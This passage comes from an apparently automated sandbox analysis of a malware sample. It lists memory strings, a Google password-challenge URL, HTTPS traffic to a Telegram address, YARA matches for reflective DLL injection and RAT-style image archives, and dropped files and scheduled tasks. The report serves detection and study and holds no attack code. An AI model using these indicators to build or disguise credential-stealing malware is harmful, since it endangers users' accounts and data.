                      Source: dwVrTdy.exe, 00000009.00000003.2034061867.000001B9CE447000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000003.2034164180.000001B9CE44A000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000003.2033786317.000001B9CE44E000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000003.2033639099.000001B9CE443000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000003.2034237403.000001B9CE453000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000003.2034309451.000001B9CE464000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/pleb
                      Source: firefox.exe, 0000002C.00000002.2608378311.00000144A9003000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/policies/privacy/
                      Source: firefox.exe, 0000002C.00000002.2608378311.00000144A9003000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/policies/privacy/mozIGeckoMediaPluginChromeService
                      Source: firefox.exe, 0000002C.00000002.2608378311.00000144A9003000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2642733104.00000144ACE00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search
                      Source: firefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/searchLOAD_ANONYMOUS_ALLOW_CLIENT_CERTapp-background-update-offgetElementForA
                      Source: t5abhIx.exe, 0000000D.00000003.2162267263.0000026D6459A000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162445204.0000026D6459A000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162651119.0000026D6459B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/t
                      Source: dwVrTdy.exe, 0000000A.00000003.2051130043.000001CDE2B2A000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 0000000A.00000003.2051091219.000001CDE2B1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/u8
                      Source: dwVrTdy.exe, 00000009.00000003.2033916766.000001B9CE439000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000003.2033727970.000001B9CE435000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/x
                      Source: t5abhIx.exe, 0000000D.00000003.2162763970.0000026D645B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/
                      Source: t5abhIx.exe, 0000000D.00000003.2162763970.0000026D645B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore
                      Source: AzVRM7c.exe, 0000000B.00000003.2097752416.000002E27742C000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000003.2097624301.000002E27742A000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000003.2097348132.000002E277429000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000003.2097888350.000002E277438000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000003.2097967560.000002E277446000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000003.2099369210.000002E277450000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000003.2097821581.000002E277435000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore(
                      Source: AzVRM7c.exe, 0000000B.00000003.2097183665.000002E277423000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000003.2097888350.000002E27742F000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162267263.0000026D6459A000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162878766.0000026D645A2000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162403692.0000026D645A1000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162176629.0000026D64591000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162445204.0000026D645A2000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162651119.0000026D645A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly
                      Source: dwVrTdy.exe, 0000000A.00000003.2051291870.000001CDE2B13000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 0000000A.00000003.2051163209.000001CDE2B10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly2
                      Source: t5abhIx.exe, 0000000D.00000003.2162267263.0000026D6459A000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162878766.0000026D645A2000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162403692.0000026D645A1000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162445204.0000026D645A2000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162651119.0000026D645A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly477BB445q
                      Source: AzVRM7c.exe, 0000000B.00000003.2097752416.000002E27742C000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000003.2097624301.000002E27742A000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000003.2097348132.000002E277429000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000003.2097888350.000002E27742F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly?
                      Source: dwVrTdy.exe, 00000009.00000003.2034412080.000001B9CE46E000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000003.2034061867.000001B9CE447000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000003.2034164180.000001B9CE44A000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000003.2034237403.000001B9CE453000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000003.2034309451.000001B9CE464000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonlyJEv)-
                      Source: t5abhIx.exe, 0000000D.00000003.2162267263.0000026D6459A000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162403692.0000026D645A1000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162176629.0000026D64591000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonlym
                      Source: t5abhIx.exe, 0000000D.00000003.2162231625.0000026D645A4000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162651119.0000026D645A5000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162176629.0000026D64591000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162982228.0000026D645BE000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162763970.0000026D645B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstoreE
                      Source: dwVrTdy.exe, 0000000A.00000003.2051354898.000001CDE2B24000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 0000000A.00000003.2051570715.000001CDE2B4A000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 0000000A.00000003.2051453805.000001CDE2B29000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 0000000A.00000003.2051513389.000001CDE2B2F000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 0000000A.00000003.2051545342.000001CDE2B49000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 0000000A.00000003.2051621385.000001CDE2B4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstoreeU
                      Source: AzVRM7c.exe, 0000000B.00000003.2097250359.000002E277431000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000003.2097348132.000002E277429000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000003.2097183665.000002E277423000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstorel
                      Source: t5abhIx.exe, 0000000D.00000003.2162763970.0000026D645B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierra
                      Source: dwVrTdy.exe, 00000009.00000003.2033786317.000001B9CE44E000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000003.2033639099.000001B9CE443000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierraZY
                      Source: t5abhIx.exe, 0000000D.00000003.2162763970.0000026D645B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierrasandbox
                      Source: dwVrTdy.exe, 00000009.00000003.2034061867.000001B9CE447000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000003.2034164180.000001B9CE44A000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000003.2034237403.000001B9CE453000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000003.2034309451.000001B9CE464000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierrasandboxzY
                      Source: firefox.exe, 0000002C.00000002.2811181588.00000144B4D81000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2610517942.00000144A9D3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
                      Source: firefox.exe, 0000002C.00000002.2836484023.000012B890804000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com
                      Source: explorer.exe, 00000014.00000000.2212795940.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/health/wellness/7-secrets-to-a-happy-old-age-backed-by-science/ss-AA1hwpvW
                      Source: explorer.exe, 00000014.00000000.2212795940.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b
                      Source: explorer.exe, 00000014.00000000.2212795940.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/companies/legacy-park-auction-canceled-liquidation-proposed-here-s-w
                      Source: explorer.exe, 00000014.00000000.2212795940.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al
                      Source: explorer.exe, 00000014.00000000.2212795940.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/realestate/my-husband-and-i-paid-off-our-mortgage-more-than-15-years
                      Source: explorer.exe, 00000014.00000000.2212795940.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/crime/bar-fight-leaves-man-in-critical-condition-suspect-arrested-in-
                      Source: explorer.exe, 00000014.00000000.2212795940.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/crime/one-dead-several-wounded-after-drive-by-shootings-in-south-la/a
                      Source: explorer.exe, 00000014.00000000.2212795940.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/opinion/decline-of-decorum-21-essential-manners-today-s-parents-fail-
                      Source: explorer.exe, 00000014.00000000.2212795940.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/california-workers-will-get-five-sick-days-instead-of-three-
                      Source: explorer.exe, 00000014.00000000.2212795940.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/pastor-of-atlanta-based-megachurch-faces-backlash-after-controv
                      Source: explorer.exe, 00000014.00000000.2212795940.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/ukraine-live-briefing-biden-does-worry-house-drama-will-impact-
                      Source: explorer.exe, 00000014.00000000.2212795940.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reve
                      Source: explorer.exe, 00000014.00000000.2212795940.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
                      Source: firefox.exe, 0000002C.00000002.2608378311.00000144A9003000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.openh264.org/
                      Source: firefox.exe, 0000002C.00000002.2836484023.000012B890804000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.tsn.ca
                      Source: firefox.exe, 0000002C.00000002.2608378311.00000144A9003000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.widevine.com/
                      Source: firefox.exe, 0000002C.00000002.2808634681.00000144B4C73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2697661848.00000144AF32A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2833775126.000004B22E200000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://youtube.com
                      Source: firefox.exe, 0000002C.00000002.2833775126.000004B22E200000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://youtube.com.
                      Source: firefox.exe, 0000002C.00000002.2697661848.00000144AF351000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/
                      Source: firefox.exe, 0000002C.00000002.2681975606.00000144AEC1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/account
                      Source: firefox.exe, 0000002C.00000002.2587816495.000001449EB4C000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
                      Source: firefox.exe, 0000002B.00000002.2484555408.000002392C0F9000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2587816495.000001449EB4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd--no-default-browser
                      Source: firefox.exe, 0000002C.00000002.2587816495.000001449EB4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd6
                      Source: firefox.exe, 0000002C.00000002.2681975606.00000144AEC1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdCheckerService:#upda
                      Source: firefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdmoz-extension://6d7f
                      Source: firefox.exe, 0000002C.00000002.2681975606.00000144AEC1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/accounteEditorEnableWrapHackMaskshowRemoteTabsFromFxaMenusendTabConfiguredAndLoa
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50090 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50206 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50305 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50206
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50305
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50090
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49903
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
                      Source: unknownHTTPS traffic detected: 216.58.208.238:443 -> 192.168.2.10:49870 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 216.58.208.238:443 -> 192.168.2.10:49875 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.217.17.65:443 -> 192.168.2.10:49878 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.217.17.65:443 -> 192.168.2.10:49883 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 216.58.208.238:443 -> 192.168.2.10:49889 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.10:49895 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.217.17.65:443 -> 192.168.2.10:49896 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.10:49900 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49903 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49908 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.10:49909 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.10:49917 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49916 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49920 version: TLS 1.2

                      System Summary

                      barindex
                      Source: 44.2.firefox.exe.144aa0f0000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                      Source: 43.2.firefox.exe.2392c270000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                      Source: 44.2.firefox.exe.144aa140000.1.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                      Source: 44.2.firefox.exe.144aa140000.1.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                      Source: 44.2.firefox.exe.144aa0f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                      Source: 43.2.firefox.exe.2392c270000.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                      Source: 20.3.explorer.exe.d60a960.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                      Source: 43.2.firefox.exe.2392dca0000.1.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                      Source: 20.0.explorer.exe.89a0000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                      Source: 20.3.explorer.exe.d60a960.1.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                      Source: 20.0.explorer.exe.89a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                      Source: 43.2.firefox.exe.2392dca0000.1.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                      Source: 0000002C.00000002.2615996030.00000144AA140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                      Source: 0000002B.00000002.2491500061.000002392DCA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                      Source: 0000002B.00000002.2489426233.000002392C270000.00000020.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                      Source: 0000002C.00000002.2615892313.00000144AA0F0000.00000020.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                      Source: 00000014.00000000.2216112963.00000000089A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\output[1].png, type: DROPPEDMatched rule: Detects images embedding archives. Observed in TheRat RAT. Author: ditekSHen
                      Source: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png, type: DROPPEDMatched rule: Detects images embedding archives. Observed in TheRat RAT. Author: ditekSHen
                      Source: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f, type: DROPPEDMatched rule: Detects images embedding archives. Observed in TheRat RAT. Author: ditekSHen
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GJ1F663Z\output[1].png, type: DROPPEDMatched rule: Detects images embedding archives. Observed in TheRat RAT. Author: ditekSHen
                      Source: 602c785fe5.exe, 0000001B.00000002.2524820308.0000000000622000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_d8629f7f-1
                      Source: 602c785fe5.exe, 0000001B.00000002.2524820308.0000000000622000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_182f0e31-0
                      Source: file.exeStatic PE information: section name:
                      Source: file.exeStatic PE information: section name: .idata
                      Source: skotes.exe.0.drStatic PE information: section name:
                      Source: skotes.exe.0.drStatic PE information: section name: .idata
                      Source: random[2].exe1.7.drStatic PE information: section name:
                      Source: random[2].exe1.7.drStatic PE information: section name: .idata
                      Source: random[2].exe1.7.drStatic PE information: section name:
                      Source: d8d3046b98.exe.7.drStatic PE information: section name:
                      Source: d8d3046b98.exe.7.drStatic PE information: section name: .idata
                      Source: d8d3046b98.exe.7.drStatic PE information: section name:
                      Source: random[1].exe.7.drStatic PE information: section name:
                      Source: random[1].exe.7.drStatic PE information: section name: .idata
                      Source: random[1].exe.7.drStatic PE information: section name:
                      Source: be08f59021.exe.7.drStatic PE information: section name:
                      Source: be08f59021.exe.7.drStatic PE information: section name: .idata
                      Source: be08f59021.exe.7.drStatic PE information: section name:
                      Source: random[1].exe1.7.drStatic PE information: section name:
                      Source: random[1].exe1.7.drStatic PE information: section name: .idata
                      Source: 9774053d4c.exe.7.drStatic PE information: section name:
                      Source: 9774053d4c.exe.7.drStatic PE information: section name: .idata
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\skotes.jobJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].pngJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\json[1].jsonJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\sendMessage[1].jsonJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeFile deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].pngJump to behavior
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00245C830_2_00245C83
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0024735A0_2_0024735A
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002888600_2_00288860
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00244DE00_2_00244DE0
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00244B300_2_00244B30
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00FF78BB2_2_00FF78BB
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00FF88602_2_00FF8860
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00FF70492_2_00FF7049
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00FF31A82_2_00FF31A8
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00FB4B302_2_00FB4B30
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00FB4DE02_2_00FB4DE0
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00FF2D102_2_00FF2D10
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00FF779B2_2_00FF779B
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00FE7F362_2_00FE7F36
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_00FF78BB3_2_00FF78BB
